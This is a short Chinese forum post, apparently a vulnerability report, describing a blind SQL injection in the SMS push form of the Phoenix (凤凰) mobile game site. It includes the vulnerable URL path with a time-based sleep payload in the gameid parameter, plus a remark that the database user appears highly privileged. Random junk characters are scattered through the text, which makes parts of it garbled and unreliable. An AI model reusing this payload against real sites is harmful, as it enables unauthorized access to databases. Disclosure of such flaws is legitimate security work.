简要描述:
$ r; L4 w7 J" H1 Q/ C& _; E0 J! F凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。# j+ D' I5 @- P+ O2 [1 ~: }
2 _0 n) o8 G/ g! j, { W$ x& y
详细说明:, j3 ]; j P/ u' G; p
存在SQL盲注url:+ E L$ U! o% ]' O+ q( S
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
" j# m2 j! \: ]! W* } S9 G! vhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
& f' R: j; @4 P# S( i5 C4 nhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png# C( M6 b4 N3 X9 k- t+ i+ q
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg$ j8 f2 Q! o+ i" Z
& {: y2 C+ a' X( v) B能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对